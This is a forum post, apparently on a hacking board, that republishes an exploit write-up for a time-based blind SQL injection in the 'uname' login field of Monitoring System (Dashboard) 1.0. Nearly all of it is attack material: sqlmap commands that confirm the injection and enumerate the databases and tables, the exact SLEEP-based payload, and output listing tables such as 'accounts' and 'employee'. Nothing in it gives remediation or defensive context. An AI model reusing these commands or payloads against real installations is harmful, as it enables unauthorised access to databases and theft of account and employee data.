This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,700 With Us For: 236 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title: Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection # Exploit Author: Richard Jones # Date: 2021-01-26 # Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html # Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 Steps. 1. Run sqlmap "sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch 2. Parameter: uname (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: uname=a' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))zdoW) AND 'YWTS'='YWTS&upass=w&btnlogin= Exploit paths: Database: sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql --dbs Tables: sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql -D asidatabase --tables [11 tables] +------------+ | accounts | | attendance | | contacts | | employee | | gallery | | msexcel | | msppt | | msword | | oic | | random | | sign | +------------+ Link to comment Share on other sites More sharing options...
Recommended Posts